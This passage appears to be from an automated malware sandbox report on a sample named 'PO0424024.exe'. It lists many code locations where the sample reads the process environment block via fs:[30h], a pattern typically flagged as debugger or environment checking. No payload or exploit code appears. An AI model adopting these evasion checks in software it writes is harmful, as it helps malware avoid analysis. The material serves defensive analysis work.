Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102903E mov eax, dword ptr fs:[00000030h]	2_2_0102903E
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102903E mov eax, dword ptr fs:[00000030h]	2_2_0102903E
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7B1B0 mov eax, dword ptr fs:[00000030h]	2_2_00F7B1B0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100705E mov ebx, dword ptr fs:[00000030h]	2_2_0100705E
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100705E mov eax, dword ptr fs:[00000030h]	2_2_0100705E
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE019F mov eax, dword ptr fs:[00000030h]	2_2_00FE019F
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE019F mov eax, dword ptr fs:[00000030h]	2_2_00FE019F
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE019F mov eax, dword ptr fs:[00000030h]	2_2_00FE019F
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE019F mov eax, dword ptr fs:[00000030h]	2_2_00FE019F
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5A197 mov eax, dword ptr fs:[00000030h]	2_2_00F5A197
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5A197 mov eax, dword ptr fs:[00000030h]	2_2_00F5A197
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5A197 mov eax, dword ptr fs:[00000030h]	2_2_00F5A197
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01035060 mov eax, dword ptr fs:[00000030h]	2_2_01035060
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FB7190 mov eax, dword ptr fs:[00000030h]	2_2_00FB7190
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA0185 mov eax, dword ptr fs:[00000030h]	2_2_00FA0185
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF9179 mov eax, dword ptr fs:[00000030h]	2_2_00FF9179
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5F172 mov eax, dword ptr fs:[00000030h]	2_2_00F5F172
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F66154 mov eax, dword ptr fs:[00000030h]	2_2_00F66154
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F66154 mov eax, dword ptr fs:[00000030h]	2_2_00F66154
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5C156 mov eax, dword ptr fs:[00000030h]	2_2_00F5C156
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F67152 mov eax, dword ptr fs:[00000030h]	2_2_00F67152
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010260B8 mov eax, dword ptr fs:[00000030h]	2_2_010260B8
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010260B8 mov ecx, dword ptr fs:[00000030h]	2_2_010260B8
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF4144 mov eax, dword ptr fs:[00000030h]	2_2_00FF4144
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF4144 mov eax, dword ptr fs:[00000030h]	2_2_00FF4144
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF4144 mov ecx, dword ptr fs:[00000030h]	2_2_00FF4144
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF4144 mov eax, dword ptr fs:[00000030h]	2_2_00FF4144
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF4144 mov eax, dword ptr fs:[00000030h]	2_2_00FF4144
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F59148 mov eax, dword ptr fs:[00000030h]	2_2_00F59148
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F59148 mov eax, dword ptr fs:[00000030h]	2_2_00F59148
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F59148 mov eax, dword ptr fs:[00000030h]	2_2_00F59148
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F59148 mov eax, dword ptr fs:[00000030h]	2_2_00F59148
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5B136 mov eax, dword ptr fs:[00000030h]	2_2_00F5B136
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5B136 mov eax, dword ptr fs:[00000030h]	2_2_00F5B136
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5B136 mov eax, dword ptr fs:[00000030h]	2_2_00F5B136
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5B136 mov eax, dword ptr fs:[00000030h]	2_2_00F5B136
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F61131 mov eax, dword ptr fs:[00000030h]	2_2_00F61131
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F61131 mov eax, dword ptr fs:[00000030h]	2_2_00F61131
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010350D9 mov eax, dword ptr fs:[00000030h]	2_2_010350D9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F90124 mov eax, dword ptr fs:[00000030h]	2_2_00F90124
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F592FF mov eax, dword ptr fs:[00000030h]	2_2_00F592FF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F702E1 mov eax, dword ptr fs:[00000030h]	2_2_00F702E1
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F702E1 mov eax, dword ptr fs:[00000030h]	2_2_00F702E1
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F702E1 mov eax, dword ptr fs:[00000030h]	2_2_00F702E1
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5B2D3 mov eax, dword ptr fs:[00000030h]	2_2_00F5B2D3
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5B2D3 mov eax, dword ptr fs:[00000030h]	2_2_00F5B2D3
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5B2D3 mov eax, dword ptr fs:[00000030h]	2_2_00F5B2D3
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8F2D0 mov eax, dword ptr fs:[00000030h]	2_2_00F8F2D0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8F2D0 mov eax, dword ptr fs:[00000030h]	2_2_00F8F2D0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102132D mov eax, dword ptr fs:[00000030h]	2_2_0102132D
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102132D mov eax, dword ptr fs:[00000030h]	2_2_0102132D
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F692C5 mov eax, dword ptr fs:[00000030h]	2_2_00F692C5
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F692C5 mov eax, dword ptr fs:[00000030h]	2_2_00F692C5
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6A2C3 mov eax, dword ptr fs:[00000030h]	2_2_00F6A2C3
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6A2C3 mov eax, dword ptr fs:[00000030h]	2_2_00F6A2C3
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6A2C3 mov eax, dword ptr fs:[00000030h]	2_2_00F6A2C3
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6A2C3 mov eax, dword ptr fs:[00000030h]	2_2_00F6A2C3
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6A2C3 mov eax, dword ptr fs:[00000030h]	2_2_00F6A2C3
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8B2C0 mov eax, dword ptr fs:[00000030h]	2_2_00F8B2C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8B2C0 mov eax, dword ptr fs:[00000030h]	2_2_00F8B2C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8B2C0 mov eax, dword ptr fs:[00000030h]	2_2_00F8B2C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8B2C0 mov eax, dword ptr fs:[00000030h]	2_2_00F8B2C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8B2C0 mov eax, dword ptr fs:[00000030h]	2_2_00F8B2C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8B2C0 mov eax, dword ptr fs:[00000030h]	2_2_00F8B2C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8B2C0 mov eax, dword ptr fs:[00000030h]	2_2_00F8B2C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01035341 mov eax, dword ptr fs:[00000030h]	2_2_01035341
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE92BC mov eax, dword ptr fs:[00000030h]	2_2_00FE92BC
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE92BC mov eax, dword ptr fs:[00000030h]	2_2_00FE92BC
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE92BC mov ecx, dword ptr fs:[00000030h]	2_2_00FE92BC
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE92BC mov ecx, dword ptr fs:[00000030h]	2_2_00FE92BC
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102A352 mov eax, dword ptr fs:[00000030h]	2_2_0102A352
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F702A0 mov eax, dword ptr fs:[00000030h]	2_2_00F702A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F702A0 mov eax, dword ptr fs:[00000030h]	2_2_00F702A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F752A0 mov eax, dword ptr fs:[00000030h]	2_2_00F752A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F752A0 mov eax, dword ptr fs:[00000030h]	2_2_00F752A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F752A0 mov eax, dword ptr fs:[00000030h]	2_2_00F752A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F752A0 mov eax, dword ptr fs:[00000030h]	2_2_00F752A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF62A0 mov eax, dword ptr fs:[00000030h]	2_2_00FF62A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF62A0 mov ecx, dword ptr fs:[00000030h]	2_2_00FF62A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF62A0 mov eax, dword ptr fs:[00000030h]	2_2_00FF62A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF62A0 mov eax, dword ptr fs:[00000030h]	2_2_00FF62A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF62A0 mov eax, dword ptr fs:[00000030h]	2_2_00FF62A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF62A0 mov eax, dword ptr fs:[00000030h]	2_2_00FF62A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF72A0 mov eax, dword ptr fs:[00000030h]	2_2_00FF72A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FF72A0 mov eax, dword ptr fs:[00000030h]	2_2_00FF72A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0101F367 mov eax, dword ptr fs:[00000030h]	2_2_0101F367
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9329E mov eax, dword ptr fs:[00000030h]	2_2_00F9329E
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9329E mov eax, dword ptr fs:[00000030h]	2_2_00F9329E
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0100437C mov eax, dword ptr fs:[00000030h]	2_2_0100437C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE0283 mov eax, dword ptr fs:[00000030h]	2_2_00FE0283
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE0283 mov eax, dword ptr fs:[00000030h]	2_2_00FE0283
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE0283 mov eax, dword ptr fs:[00000030h]	2_2_00FE0283
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9E284 mov eax, dword ptr fs:[00000030h]	2_2_00F9E284
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9E284 mov eax, dword ptr fs:[00000030h]	2_2_00F9E284
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA1270 mov eax, dword ptr fs:[00000030h]	2_2_00FA1270
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FA1270 mov eax, dword ptr fs:[00000030h]	2_2_00FA1270
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F89274 mov eax, dword ptr fs:[00000030h]	2_2_00F89274
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F64260 mov eax, dword ptr fs:[00000030h]	2_2_00F64260
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F64260 mov eax, dword ptr fs:[00000030h]	2_2_00F64260
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F64260 mov eax, dword ptr fs:[00000030h]	2_2_00F64260
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0103539D mov eax, dword ptr fs:[00000030h]	2_2_0103539D
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5826B mov eax, dword ptr fs:[00000030h]	2_2_00F5826B
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5A250 mov eax, dword ptr fs:[00000030h]	2_2_00F5A250
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F66259 mov eax, dword ptr fs:[00000030h]	2_2_00F66259
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F9724D mov eax, dword ptr fs:[00000030h]	2_2_00F9724D
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F59240 mov eax, dword ptr fs:[00000030h]	2_2_00F59240
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F59240 mov eax, dword ptr fs:[00000030h]	2_2_00F59240
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0101C3CD mov eax, dword ptr fs:[00000030h]	2_2_0101C3CD
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5823B mov eax, dword ptr fs:[00000030h]	2_2_00F5823B
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0101B3D0 mov ecx, dword ptr fs:[00000030h]	2_2_0101B3D0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0101F3E6 mov eax, dword ptr fs:[00000030h]	2_2_0101F3E6
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F97208 mov eax, dword ptr fs:[00000030h]	2_2_00F97208
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F97208 mov eax, dword ptr fs:[00000030h]	2_2_00F97208
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010353FC mov eax, dword ptr fs:[00000030h]	2_2_010353FC
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F963FF mov eax, dword ptr fs:[00000030h]	2_2_00F963FF
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7E3F0 mov eax, dword ptr fs:[00000030h]	2_2_00F7E3F0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7E3F0 mov eax, dword ptr fs:[00000030h]	2_2_00F7E3F0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F7E3F0 mov eax, dword ptr fs:[00000030h]	2_2_00F7E3F0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F703E9 mov eax, dword ptr fs:[00000030h]	2_2_00F703E9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F703E9 mov eax, dword ptr fs:[00000030h]	2_2_00F703E9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F703E9 mov eax, dword ptr fs:[00000030h]	2_2_00F703E9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F703E9 mov eax, dword ptr fs:[00000030h]	2_2_00F703E9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F703E9 mov eax, dword ptr fs:[00000030h]	2_2_00F703E9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F703E9 mov eax, dword ptr fs:[00000030h]	2_2_00F703E9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F703E9 mov eax, dword ptr fs:[00000030h]	2_2_00F703E9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F703E9 mov eax, dword ptr fs:[00000030h]	2_2_00F703E9
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01035227 mov eax, dword ptr fs:[00000030h]	2_2_01035227
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]	2_2_00F6A3C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]	2_2_00F6A3C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]	2_2_00F6A3C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]	2_2_00F6A3C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]	2_2_00F6A3C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F6A3C0 mov eax, dword ptr fs:[00000030h]	2_2_00F6A3C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F683C0 mov eax, dword ptr fs:[00000030h]	2_2_00F683C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F683C0 mov eax, dword ptr fs:[00000030h]	2_2_00F683C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F683C0 mov eax, dword ptr fs:[00000030h]	2_2_00F683C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F683C0 mov eax, dword ptr fs:[00000030h]	2_2_00F683C0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0101B256 mov eax, dword ptr fs:[00000030h]	2_2_0101B256
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0101B256 mov eax, dword ptr fs:[00000030h]	2_2_0101B256
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F933A0 mov eax, dword ptr fs:[00000030h]	2_2_00F933A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F933A0 mov eax, dword ptr fs:[00000030h]	2_2_00F933A0
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F833A5 mov eax, dword ptr fs:[00000030h]	2_2_00F833A5
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FB739A mov eax, dword ptr fs:[00000030h]	2_2_00FB739A
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FB739A mov eax, dword ptr fs:[00000030h]	2_2_00FB739A
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F58397 mov eax, dword ptr fs:[00000030h]	2_2_00F58397
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F58397 mov eax, dword ptr fs:[00000030h]	2_2_00F58397
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F58397 mov eax, dword ptr fs:[00000030h]	2_2_00F58397
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102D26B mov eax, dword ptr fs:[00000030h]	2_2_0102D26B
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_0102D26B mov eax, dword ptr fs:[00000030h]	2_2_0102D26B
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01010274 mov eax, dword ptr fs:[00000030h]	2_2_01010274
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01010274 mov eax, dword ptr fs:[00000030h]	2_2_01010274
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01010274 mov eax, dword ptr fs:[00000030h]	2_2_01010274
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01010274 mov eax, dword ptr fs:[00000030h]	2_2_01010274
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01010274 mov eax, dword ptr fs:[00000030h]	2_2_01010274
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01010274 mov eax, dword ptr fs:[00000030h]	2_2_01010274
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01010274 mov eax, dword ptr fs:[00000030h]	2_2_01010274
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01010274 mov eax, dword ptr fs:[00000030h]	2_2_01010274
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01010274 mov eax, dword ptr fs:[00000030h]	2_2_01010274
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01010274 mov eax, dword ptr fs:[00000030h]	2_2_01010274
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01010274 mov eax, dword ptr fs:[00000030h]	2_2_01010274
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01010274 mov eax, dword ptr fs:[00000030h]	2_2_01010274
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8438F mov eax, dword ptr fs:[00000030h]	2_2_00F8438F
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F8438F mov eax, dword ptr fs:[00000030h]	2_2_00F8438F
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5E388 mov eax, dword ptr fs:[00000030h]	2_2_00F5E388
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5E388 mov eax, dword ptr fs:[00000030h]	2_2_00F5E388
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F5E388 mov eax, dword ptr fs:[00000030h]	2_2_00F5E388
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_01035283 mov eax, dword ptr fs:[00000030h]	2_2_01035283
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F67370 mov eax, dword ptr fs:[00000030h]	2_2_00F67370
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F67370 mov eax, dword ptr fs:[00000030h]	2_2_00F67370
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F67370 mov eax, dword ptr fs:[00000030h]	2_2_00F67370
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE035C mov eax, dword ptr fs:[00000030h]	2_2_00FE035C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE035C mov eax, dword ptr fs:[00000030h]	2_2_00FE035C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE035C mov eax, dword ptr fs:[00000030h]	2_2_00FE035C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE035C mov ecx, dword ptr fs:[00000030h]	2_2_00FE035C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE035C mov eax, dword ptr fs:[00000030h]	2_2_00FE035C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE035C mov eax, dword ptr fs:[00000030h]	2_2_00FE035C
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010292A6 mov eax, dword ptr fs:[00000030h]	2_2_010292A6
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010292A6 mov eax, dword ptr fs:[00000030h]	2_2_010292A6
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010292A6 mov eax, dword ptr fs:[00000030h]	2_2_010292A6
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_010292A6 mov eax, dword ptr fs:[00000030h]	2_2_010292A6
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F59353 mov eax, dword ptr fs:[00000030h]	2_2_00F59353
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00F59353 mov eax, dword ptr fs:[00000030h]	2_2_00F59353
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE2349 mov eax, dword ptr fs:[00000030h]	2_2_00FE2349
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE2349 mov eax, dword ptr fs:[00000030h]	2_2_00FE2349
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE2349 mov eax, dword ptr fs:[00000030h]	2_2_00FE2349
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE2349 mov eax, dword ptr fs:[00000030h]	2_2_00FE2349
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE2349 mov eax, dword ptr fs:[00000030h]	2_2_00FE2349
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE2349 mov eax, dword ptr fs:[00000030h]	2_2_00FE2349
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE2349 mov eax, dword ptr fs:[00000030h]	2_2_00FE2349
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE2349 mov eax, dword ptr fs:[00000030h]	2_2_00FE2349
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE2349 mov eax, dword ptr fs:[00000030h]	2_2_00FE2349
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE2349 mov eax, dword ptr fs:[00000030h]	2_2_00FE2349
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE2349 mov eax, dword ptr fs:[00000030h]	2_2_00FE2349
Source: C:\Users\user\Desktop\PO0424024.exe	Code function: 2_2_00FE2349 mov eax, dword ptr fs:[00000030h]	2_2_00FE2349
